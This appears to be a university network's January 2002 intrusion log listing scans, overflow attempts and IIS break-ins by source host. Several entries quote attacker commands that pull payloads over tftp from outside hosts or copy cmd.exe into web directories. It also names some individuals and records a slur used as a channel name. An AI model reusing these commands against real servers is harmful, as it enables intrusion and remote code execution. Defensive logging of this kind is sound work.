2002/01/20-16:49:53.86 199.73.33.11 (Verio, Inc,CO,US) scan several ips, 1 pkt to random high number port
2002/01/20-17:09:49.16 194.67.57.41 (f11.mail.ru) scan several ips, 1 pkt to random high number port
2002/01/20-17:53:01.67 62.119.28.105 (www5.aname.net) scan several ips, 1 pkt to random high number port, all day long
2002/01/20-18:08:40.05 209.195.62.45 (Comstar Communications Corporation,GA,US) scan several ips, 1 pkt to random high number port
2002/01/20-18:13:44.28 61.177.61.242 (CHINANET Jiangsu province network) 1. attack pc w/IIS server with command:
2002/01/20-18:13:44.28 61.177.61.242 (CHINANET Jiangsu province network) 2. tftp%20-i%20132.232.9.225%20GET%20Admin.dll%20c:\Admin.dll
2002/01/20-18:53:06.26 203.198.189.51 (ipvpn064051.netvigator.com) scan net for port 1433
2002/01/20-21:33:38.36 62.211.25.77 (Telecom Italia Net,IT) scan net for port 111 - rstatd
2002/01/20-22:05:29.93 195.54.102.4 (ircu.bredband.com) scan several ips, 1 pkt to random high number port
2002/01/21-00:37:30.34 203.106.79.37 (TMnet Telekom Malaysia) scan net for ports 21,23
2002/01/21-00:41:21.03 200.12.166.34 (at XOLO.CONABIO.GOV.MX maybe?) scan net for ports 111,23 - rstatd
2002/01/21-00:53:39.07 61.132.13.120 (CHINANET Jiangsu province network,CN) multiple tries to connect to 132.235.1.35 ports 80,21
2002/01/21-02:06:59.17 210.186.104.25 (TMnet Telekom Malaysia,MY) scan net for ports 21,23
2002/01/21-02:14:35.22 210.186.104.25 (TMnet Telekom Malaysia,MY) scan net for port 21
2002/01/21-02:30:21.06 203.197.214.121 (Leased line - CMC Limited, New Delhi,IN) scan net for ports 111,23 - rstatd
2002/01/21-02:36:53.23 211.43.165.212 (korea crap) attack local freenet w/ port 111 buff overflow attack - ttdbserverd
2002/01/21-03:18:08.37 61.147.44.202 (CHINANET Jiangsu province network) try to use 132.235.1.70 as dns server
2002/01/21-06:17:42.95 216.40.214.203 (mail.bigtimee.com) scan several ips, 1 pkt to random high number port
2002/01/21-07:40:24.70 65.198.68.56 (netmapper.research.lumeta.com) scan net for port 33435
2002/01/21-08:21:36.18 205.158.121.166 (TCS Global/INTESOLV,CA,US) scan net for ports 445 139
2002/01/21-11:10:21.71 213.51.203.171 (cc139034-c.ensch1.ov.nl.home.com) start of file transfers to/from hacked machines
2002/01/21-11:46:27.06 213.51.203.154 (cc139034-b.ensch1.ov.nl.home.com) start of file transfers to/from hacked machines
2002/01/21-14:58:05.78 131.174.118.65 (catv8065.extern.kun.nl) start of file transfers to/from hacked machines
2002/01/21-15:11:10.29 128.2.161.177 (CREWINGQ.RES.CMU.EDU) start of file transfers to/from hacked machines
2002/01/21-15:59:16.15 80.13.242.62 (AAmiens-104-1-2-62.abo.wanadoo.fr) connect to 2 networked printers on ports 21, 137
2002/01/21-16:22:33.68 213.51.203.171 (cc139034-c.ensch1.ov.nl.home.com) 1. attack pc w/IIS server with command:
2002/01/21-16:22:33.68 213.51.203.171 (cc139034-c.ensch1.ov.nl.home.com) 2. tftp+-i+213.51.203.171+rundll.sys+c:\inetpub\iissamples\default\config\rundll.sys
2002/01/21-16:53:12.66 213.99.117.24 (213-99-117-24.uc.nombres.ttd.es) attempt to log on to 132.235.1.1 using stolen passwds
2002/01/21-17:14:35.21 213.99.117.24 (213-99-117-24.uc.nombres.ttd.es) portscan 132.235.1.1
2002/01/21-17:30:54.67 65.198.68.240 (h65-198-68-240.lumeta.com) scan net for port 33435
2002/01/21-18:34:25.99 128.2.198.11 (HALPORT.PC.CS.CMU.EDU) scan net for port 33435
2002/01/21-19:00:03.96 168.122.240.8 (bays030-0201-dhcp008.bu.edu) start of file transfers to/from hacked machines
2002/01/21-19:32:34.87 216.3.1.111 (dyn046-ts9a.athens.frognet.net) portscan 132.235.1.1 on ports 445 137 139
2002/01/21-19:52:35.37 141.158.74.103 (pool-141-158-74-103.pitt.east.verizon.net) scan net for port 33435
2002/01/21-21:09:13.79 61.132.13.120 (CHINANET Jiangsu province network,CN) multiple tries to connect to 132.235.1.35 port 80
2002/01/21-22:05:27.91 129.125.103.44 (flits103-44.flits.rug.nl) start of file transfers to/from hacked machines
2002/01/21-23:22:01.15 213.84.251.135 (gloop.xs4all.nl) start of file transfers to/from hacked machines
2002/01/21-23:53:21.90 213.46.124.61 (d124061.upc-d.chello.nl) start of file transfers to/from hacked machines
2002/01/22-00:54:04 210.184.3.134 (Toppan Forms Ltd,HK) scan net for port 80
2002/01/22-01:51:08.48 213.46.141.241 (d141241.upc-d.chello.nl) start of file transfers to/from hacked machines
2002/01/22-05:00:29.22 213.24.31.184 (host184.gspuniver.ru) scan net for port 137
2002/01/22-05:56:54.89 213.24.31.184:137 (host184.gspuniver.ru) scan net for port 137
2002/01/22-06:16:48.65 65.208.146.150 (Syntex Networks,CA,US) scan net for port 25
2002/01/22-08:58:59.67 209.43.49.80 (iq-ind-as002-80.iquest.net) probe ports 4366[1,2,3] on 132.235.3.133
2002/01/22-10:16:39.25 204.152.186.58 (proxy8.monitor.dal.net) scan ports 1080 3128 8080 81 8081 23 twice on 1 machine.
2002/01/22-11:15:09.02 132.235.144.195 (dhcp-144-195.cns.ohiou.edu) scan net for port 524
2002/01/22-11:23:02.32 132.235.144.195 (dhcp-144-195.cns.ohiou.edu) scan net for port 524
2002/01/22-11:23:33.36 65.198.68.56 (netmapper.research.lumeta.com) scan net for port 33435
2002/01/22-12:10:33.91 132.235.177.183 (dhcp-177-183.west-green.ohiou.edu) scan net for port 139
2002/01/22-12:11:06.10 132.235.177.183 (dhcp-177-183.west-green.ohiou.edu) portscan specific ips on 445,139,80
2002/01/22-12:12:32.41 132.235.177.183 (dhcp-177-183.west-green.ohiou.edu) scan net for port 80
2002/01/22-13:20:03.48 61.177.61.242 (CHINANET Jiangsu province network) 1. attack IIS server on pcs with cmd
2002/01/22-13:20:03.48 61.177.61.242 (CHINANET Jiangsu province network) 2. tftp%20-i%20132.232.9.225%20GET%20Admin.dll%20c:\Admin.dll
2002/01/22-13:20:03.48 61.177.61.242 (CHINANET Jiangsu province network) 3. until 2002/01/22-17:45:10.01
2002/01/22-14:18:38.77 206.34.8.50 (wxs.silval.fr.com) probe ports 111,21 on 132.235.3.133
2002/01/22-14:43:01.72 132.235.157.96 (dhcp-157-096.south-green.ohiou.edu) scan net for port 80
2002/01/22-15:04:00.47 131.211.67.101 (knagserver.geog.uu.nl) 1. attack IIS servers with cmds
2002/01/22-15:04:00.47 131.211.67.101 (knagserver.geog.uu.nl) 2. +ping+-v+udp+-n+2000+-l+62000+-w+0+217.81.155.49
2002/01/22-15:28:57.73 132.235.157.96 (dhcp-157-096.south-green.ohiou.edu) scan net for port 80 again
2002/01/22-15:40:57.14 128.186.27.6:113 (dhcp2706.salley.fsu.edu) scan several ips, 1 pkt to random high number port
2002/01/22-17:23:47.91 68.39.44.15 (bgp581983bgs.eatntn01.nj.comcast.net) scan net for port 33435
2002/01/22-17:52:03.98 200.226.136.143 (143.136.226.200.in-addr.arpa.ig.com.br) scan several ips, 1 pkt to random high number port
2002/01/22-18:52:08.91 64.7.3.122 (whatexit.org) scan net for port 33435
2002/01/22-19:11:52.38 61.177.251.184 (CHINANET Jiangsu province network) pound on 132.235.1.35:80 for some reason
2002/01/22-19:11:54.12 61.132.13.120 (CHINANET Jiangsu province network) pound on 132.235.1.35:80 for some reason
2002/01/23-00:36:06.56 64.232.202.4 (ns1.starlink.com) scan net for port 21
2002/01/23-01:02:04.34 210.19.26.130 (MESINIAGA BERHAD,MY) scan net for port 515
2002/01/23-01:38:09.79 65.105.223.11 (XO Communications,CA,US) scan net for port 515
2002/01/23-02:59:13.69 148.243.244.3 (na-148-243-244-3.na.avantel.net.mx) scan net for port 22
2002/01/23-04:12:23.96 65.92.139.103 (HSE-Montreal-ppp335588.sympatico.ca) scan net for port 21
2002/01/23-07:12:42.74 132.235.238.1:1056 (admin.memaud.ohiou.edu) scan net for port 38293
2002/01/23-08:01:47.71 132.235.144.195 (dhcp-144-195.cns.ohiou.edu) scan net for port 524
2002/01/23-08:17:24.59 132.235.90.7:1031 (OUCOM - ohiou.edu) scan net for port 38293
2002/01/23-09:10:55.52 217.225.62.198 (pD9E13EC6.dip.t-dialin.net) scan net for port 80
2002/01/23-09:11:23.62 217.225.62.198 (pD9E13EC6.dip.t-dialin.net) scan net for port 80
2002/01/23-12:28:35.32 80.13.216.171 (ALyon-202-1-6-171.abo.wanadoo.fr) scan net for port 80
2002/01/23-14:13:20.71 193.251.50.128 (ATuileries-101-1-2-128.abo.wanadoo.fr) scan net for port 1433
2002/01/23-14:53:15.01 132.235.177.183 (dhcp-177-183.west-green.ohiou.edu) scan net for ports 139, 445
2002/01/23-14:55:28.48 132.235.94.25 (something.ohiou.edu - Sachin Jain) scan net for port 41524
2002/01/23-15:32:24.99 66.110.142.4 (adsl-66.110.142-4.globetrotter.net) scan net for port 21
2002/01/23-19:45:34.08 132.235.177.183 (dhcp-177-183.west-green.ohiou.edu) portscan selected ips
2002/01/23-19:56:47.84 204.60.155.137 (Southern New England Telephone,CT,US) scan net for port 80
2002/01/23-20:35:38.03 61.147.57.13 (CHINANET Jiangsu province network) pound on 132.235.1.35:80 for some reason
2002/01/23-20:39:31.03 61.177.251.58 (CHINANET Jiangsu province network) pound on 132.235.1.35:80 for some reason
2002/01/23-23:36:55.43 148.243.244.3 (na-148-243-244-3.na.avantel.net.mx) probe ports 23,22,21,25 on 132.235.16.101
2002/01/24-00:27:19.12 132.235.157.96 (dhcp-157-096.south-green.ohiou.edu) scan net for port 139
2002/01/24-00:44:33.70 132.235.157.96 (dhcp-157-096.south-green.ohiou.edu) portscan of multiple IPs, ports 3 thru ....
2002/01/24-01:18:47.40 62.122.0.89 (62-122-0-89.adsl.galactica.it) scan net for port 23, then port 111 on select ips
2002/01/24-02:27:20.78 213.225.76.89 (Jaren Kabel TV,NO) scan net for port 27374
2002/01/24-05:18:15.67 148.208.88.4 (Secretaria de Educacion e Investigacion Tecnologic,MX) scan net for port 23
2002/01/24-05:18:16.69 148.208.88.4 (Secretaria de Educacion e Investigacion Tecnologic) scan net for port 23
2002/01/24-05:48:18.30 132.235.144.195 (dhcp-144-195.cns.ohiou.edu) scan net for port 524
2002/01/24-06:47:55.17 202.102.9.10 (CHINANET Jiangsu province network,CN) 1. scan net for port 80, attack IIS w/ command
2002/01/24-06:47:55.17 202.102.9.10 (CHINANET Jiangsu province network,CN) 2.
ftp%20-i%20132.236.33.90%20GET%20cool.dll%20c:\httpodbc.dll 2002/01/24-08:18:23.79 207.71.92.221 (shieldsup.grc.com) portscan 132.235.19.64 (requested from 207.71.92.193 ?)) 2002/01/24-08:27:32.95 24.114.52.28 (CPE002078ccb377.cpe.net.cable.rogers.com) scannet for port 6112 2002/01/24-08:27:33.99 24.114.52.28 (CPE002078ccb377.cpe.net.cable.rogers.com) scannet for port 3784 2002/01/24-09:53:09.67 128.121.247.121 (Verio, Inc.,CA,US) scannet for port 111 - statdx exploit 2002/01/24-11:59:40.23 217.228.98.46 (pD9E4622E.dip.t-dialin.net) scannet with ping 2002/01/24-12:01:06.75 217.228.98.46 (pD9E4622E.dip.t-dialin.net) scannet for port 80 2002/01/24-13:22:11.73 195.232.60.37 (fra-tgn-ozb-vty37.as.wcom.net) scannet for port 111 2002/01/24-16:09:59.57 217.225.57.16 (pD9E13910.dip.t-dialin.net) scannet for port 80 2002/01/24-16:50:46.89 208.185.156.65 (core3-core5-oc48.sjc2.above.net) scan several ips, 1 pkt to random high number port 2002/01/24-17:08:18 217.128.45.211 (ABoulogne-103-1-4-211.abo.wanadoo.fr) scannet for port 21 2002/01/24-17:39:23.47 138.89.113.133 (pool-138-89-113-133.mad.east.verizon.net) scannet for prt 33435 UDP 2002/01/24-19:38:54.11 61.177.251.58 (CHINANET Jiangsu province network) pound on 132.235.1.35:80 for some reason 2002/01/25-02:30:28.04 212.186.231.163 (cha212186231163.chello.fr) scannet for port 21, anon ftp attacks 2002/01/25-04:45:48.47 80.130.205.184 (p5082CDB8.dip.t-dialin.net) scannet for port 21 2002/01/25-09:24:16.04 62.211.25.154 (Telecom Italia Net,IT) scannet fo rport 111 - rstatd attack 2002/01/25-12:12:07 193.252.2.63 (ANeuilly-101-1-4-63.abo.wanadoo.fr) scannet for port80 2002/01/25-16:48:34.09 200.202.28.153 (dial-1-153.tro.matrix.com.br) attack packers, break in, setup irc server channel n1ggar 2002/01/25-17:17:26.54 132.211.72.140 (usager72-140.hec.ca) 1. attack IIS servers on net with command: 2002/01/25-17:17:26.54 132.211.72.140 (usager72-140.hec.ca) 2. 
tftp%20-i%20132.211.72.140%20GET%20cool.dll%20c:\httpodbc.dll 2002/01/25-19:13:31.55 213.46.44.226 (d44226.upc-d.chello.nl) scannet for port 21 2002/01/25-22:44:56.17 207.232.171.35 (State of South Carolina,SC,US) 1. attack IIS server on 132.235.15.151 with command" 2002/01/25-22:44:56.17 207.232.171.35 (State of South Carolina,SC,US) 2. cmd.exe?/c+c:\inetpub\scripts\tools\bar.bat 2002/01/26-03:02:56.11 24.43.54.240 (CPE0080c6f02f26.cpe.net.cable.rogers.com) attack every hour ports 8080,81,3128,54 on 132.235.15.151 2002/01/26-06:25:20 63.104.243.41 (agnewbennett.fw.ldl.net) scannet for port 22 2002/01/26-12:22:25.22 209.122.64.204 (RCN Corporation,NJ,US) scannet for port 21 2002/01/26-12:46:34.05 216.35.116.92 (si3002.inktomi.com) scan port 8000 on 132.235.1.6 2002/01/26-13:44:06.74 208.186.96.6 (news.csolutions.net) scan random ips on net, 1 packer per ip, to high number port 2002/01/26-15:50:28.97 207.232.171.35 (State of South Carolina,SC,US) 1. attack IIS server on 132.235.15.151 with command" 2002/01/26-15:50:28.97 207.232.171.35 (State of South Carolina,SC,US) 2. cmd.exe?/c+c:\inetpub\scripts\tools\bar.bat 2002/01/26-15:54:29.15 217.85.45.120 (pD9552D78.dip.t-dialin.net) 1. 1. attack IIS servers via buff/overflwo with command 2002/01/26-15:54:29.15 217.85.45.120 (pD9552D78.dip.t-dialin.net) 2. md.exe?/c+c:\inetpub\scripts\tools\bar.bat 2002/01/26-15:54:29.15 217.85.45.120 (pD9552D78.dip.t-dialin.net) 3. tftp.exe+-i+217.85.45.120+GET+test.txt+c:\inetpub\wwwroot\_vti_pvt\test.txt 2002/01/26-15:54:29.15 217.85.45.120 (pD9552D78.dip.t-dialin.net) 4. tftp.exe+-i+217.85.45.120+GET+test.txt+c:\inetpub\wwwroot\_vti_pvt\test.txt 2002/01/26-22:44:54 12.234.139.210 (12-234-139-210.client.attbi.com) scannet for port80 2002/01/26-22:57:43 63.124.248.132 (host69-132.prestige.net) scannet for port 80 2002/01/26-23:42:31.36 68.41.39.62 (bgp943439bgs.canton01.mi.comcast.net) scan port 8080 on 132.235.1.11 2002/01/26-23:53:32.02 67.218.71.146 (1Cust146.tnt11.sfo3.da.uu.net) 1. 
attack IIS server on 132.235.19.97with command 2002/01/26-23:53:32.02 67.218.71.146 (1Cust146.tnt11.sfo3.da.uu.net) 2. copy%20c:\winnt\system32\cmd.exe%20c:\inetpub\scripts\w3svc.exe 2002/01/27-07:23:27 137.250.50.132:22 (University of Augsburg,DE) scannet for port22 2002/01/27-19:55:45.98 210.242.87.35 (CHTD, Chunghwa Telecom Co.,Ltd.,TW) scannet for port 23 2002/01/28-01:41:16.57 24.145.143.5 (user-0c933o5.cable.mindspring.com) scan 132.235.1.1 for port 119,563 2002/01/28-01:52:26.18 12.39.105.232 (POINT2POINT COMMUNICATIONS,TX.US) scannet for port 21 2002/01/28-07:04:48.39 24.43.54.240 (CPE0080c6f02f26.cpe.net.cable.rogers.com) port scan 132.235.15.151 on port 8000,81,54,1080,3128 2002/01/28-07:39:02.32 68.10.72.142 (ip68-10-72-142.hr.hr.cox.net) conn to hacker port on 132.235.15.151 2002/01/28-08:23:39.24 65.165.128.102 (BUDGET MANAGEMENT LLC,NM,US) scan 132.235.15.151 ports 23,1080 2002/01/28-09:58:15.11 24.27.237.92 (24.27.237.92.merrittisland-ubr-a.cfl.rr.com) scannet for port 80 2002/01/28-12:48:57.64 213.245.238.64 (cha213245238064.chello.fr) 1. attack IIS on 132.235.16.217 with command: 2002/01/28-12:48:57.64 213.245.238.64 (cha213245238064.chello.fr) 2 type+c:\Inetpub\wwwroot\_vti_pvt\serv-u.ini+1 2002/01/28-12:48:57.64 213.245.238.64 (cha213245238064.chello.fr) scannet for port 80 2002/01/28-13:09:44.05 237.92 (24.27.237.92.merrittisland-ubr-a.cfl.rr.com) scannet for port 80 2002/01/28-13:12:27.89 24.154.37.181 (acs-24-154-37-181.zoominternet.net) access hacker ftp deamon on 132.235.16.217 2002/01/28-13:12:27.89 24.154.37.181 (acs-24-154-37-181.zoominternet.net) access hacker ftp deamon on 132.235.16.217 2002/01/28-17:11:08.18 200.202.28.242 (dial-1-242.tro.matrix.com.br) hacker back breaking in packers 2002/01/28-18:10:53.07 217.85.101.175 (pD95565AF.dip.t-dialin.net) scannet fo rport 21 2002/01/28-23:10:32.36 132.248.225.83 (Universidad Nacional Autonoma de Mexico,MX) 1. 
attack IIS server on 132.235.19.158 with command: 2002/01/28-23:10:32.36 132.248.225.83 (Universidad Nacional Autonoma de Mexico,MX) 2. tftp%20-i%20132.248.225.83%20GET%20cool.dll%20d:\httpodbc.dll 2002/01/29-00:45:11.56 62.42.7.176 (VA1-1B-u-0943.mc.onolab.com) scannet for port 21 2002/01/29-07:19:56.08 217.85.101.175 (D95565AF.dip.t-dialin.net) scannet for port 21 2002/01/29-08:05:20.80 132.235.162.112 (dhcp-162-112.east-green.ohiou.edu) scannet for ports 80,139,137,445 2002/01/29-10:07:26.27 132.235.224.17 (share.cofa.ohiou.edu) scannet for port 80 2002/01/29-10:48:10.35 204.101.179.35 (WorldLinx Telecommunications, Inc.,Ontario,CA) scan random ips on net, 1 packer per ip, to high number port 2002/01/29-10:50:40.19 129.21.106.51:3389 (res106a-051.rh.rit.edu) scan random ips on net, 1 packer per ip, to high number port 2002/01/29-13:08:53.08 62.211.188.232 (TINIT-ADSL-LITE,IT) scannet for port 111, buff overflow attack rstatd 2002/01/29-14:40:39.76 62.211.25.100 (Telecom Italia Net,IT) scannet for port 111, rstatd attack 2002/01/29-15:24:33.60 209.148.64.171 (skimogul.look.ca) scannet for port 6112 2002/01/29-15:24:33.60 209.148.64.171 (skimogul.look.ca) scannet for port 6112, buff overflow attack 2002/01/29-15:40:32.25 64.81.213.144 (dsl081-213-144.nyc2.dsl.speakeasy.net) scannet for port 21 2002/01/29-16:08:18.52 66.92.175.131 (dsl092-175-131.wdc1.dsl.speakeasy.net)scannet for port 22 2002/01/29-16:32:45.86 132.235.144.195 (dhcp-144-195.cns.ohiou.edu) scannet for port 524, 137,139 2002/01/29-19:03:15.82 204.101.179.35 (...rocler.qc.ca) scan random ips on net, 1 packer per ip, to high number port 2002/01/29-23:58:25.60 156.34.219.175 (fctn1-2991.nb.vibe.net) scannet for port 80 2002/01/30-02:03:38.69 204.101.179.28 (web.rocler.qc.ca) scan random ips on net, 1 packer per ip, to high number port 2002/01/30-07:47:26.39 161.58.238.4:25 (iiswebsites.com) scan random ips on net, 1 packer per ip, to high number port, 5ips/hr 2002/01/30-09:07:09.79 195.92.95.61 
(ariston.netcraft.com) scannet for prt 80 2002/01/30-11:30:00.83 200.215.1.1 (BrT-f1-1-0.fns300.telesc.net.br) scan random ips on net, 1 packer per ip, to high number port 2002/01/30-14:22:19.66 195.70.147.22:21 (server.juristic.cz) scannet for port 21-SYN FIN scan 2002/01/30-14:34:57.05 132.235.162.112 (dhcp-162-112.east-green.ohiou.edu) scannet for port 80 2002/01/30-14:44:24.01 204.60.164.66 (Southern New England Telephone,CT,US) 1. attack 132.235.18.156 via IIS w/command: 2002/01/30-14:44:24.01 204.60.164.66 (Southern New England Telephone,CT,US) 2. tftp+"-i"+80.135.61.104+GET+servu.exe+c:\WNNT\system32\Com\servu.exe 2002/01/30-14:44:24.01 204.60.164.66 (Southern New England Telephone,CT,US) 3. tftp+"-i"+80.135.61.104+GET+login.txt+c:\ASFRoot\login.txt 2002/01/30-15:12:59.79 132.235.162.112 (dhcp-162-112.east-green.ohiou.edu) 1. scannet for IIS server with cmd.exe execute scan 2002/01/30-15:12:59.79 132.235.162.112 (dhcp-162-112.east-green.ohiou.edu) 2. attack w/ tftp -i 132.235.162.112 GET cool.dll e:\httpodbc.dll ttpodbc.dll 2002/01/30-20:40:24.64 132.235.1.49 (odd33.cs.ohiou.edu) user jprofitt portscanned 216.153.217.132 logged in from 24.31.172.209 2002/01/30-21:34:35.37 66.79.158.80 (qepod00-alias.C10-0.SJC.ivmg.net) 20 packets per port UDP, ports 20046-20490 2002/01/30-23:04:55.90 64.35.105.238 (9 Net Avenue, Inc.,NJ,US) scannet for port 22 2002/01/31-02:51:29.11 64.23.48.70 (SkyNetWEB,MARYLAND,US) scannet w/ 1 packet to high num port per ip. slow scan 2002/01/31-04:16:18.44 61.147.52.71 (CHINANET Jiangsu province network,CN) bang on 132.235.1.35:21 2002/01/31-07:12:26.54 24.169.15.61 (cm-24-169-15-61.nycap.rr.com) scannet for port 1433,445,139 2002/01/31-07:17:30.81 64.215.166.34 (Akamai Technologies/S.F.,MA,US) cannet w/ 1 packet to high num port per ip. slow scan 2002/01/31-07:17:53.31 172.188.28.159 (ACBC1C9F.ipt.aol.com) sc annet w/ 1 packet to high num port per ip. 
slow scan 2002/01/31-07:23:07.85 132.235.144.195 (dhcp-144-195.cns.ohiou.edu) slowscan of net for ports 137,524 (1 ip per hr or less) 2002/01/31-07:51:22.46 61.147.45.86 (CHINANET Jiangsu province network,CN) multiple tries to use 132.235.1.70 as dns server 2002/01/31-08:12:05.08 200.223.255.197 (AComite Gestor da Internet no Brasil,BR) scannet w/ 1 packet to high num port per ip. slow scan 2002/01/31-09:35:10.41 216.133.249.14 (proxy4.monitor.dal.net) scan 2 ips for ports 23, 80, 1080, 8080, 8081,81 2002/01/31-11:31:27.40 63.219.148.233 (jcarroll.adsl.st.staffnet.com) scannet w/ 1 packet to high num port per ip. slow scan 2002/01/31-11:39:57.98 66.28.14.59 (Cogent Communications,WASH/.DC,US) scannet for port 80, fp30reg.dll access 2002/01/31-13:40:46.21 62.119.28.105 (www5.aname.net) scannet w/ 1 packet to high num port per ip. slow scan 2002/01/31-17:06:56.65 157.238.46.35 (Verio, Inc.CO,US) annet w/ 1 packet to high num port per ip. slow scan 2002/01/31-18:38:01.34 193.110.95.1 (minotor.spale.com) sc annet w/ 1 packet to high num port per ip. slow scan 2002/01/31-21:26:23.63 149.142.147.130:21(UCLA Campus Network Services) scannet for port 21 2002/01/31-22:42:50.87 172.130.237.188 (AC82EDBC.ipt.aol.com) sc annet w/ 1 packet to high num port per ip. slow scan 2002/01/31-23:14:52.45 68.41.39.62 (bgp943439bgs.canton01.mi.comcast.net) scannet for port 8080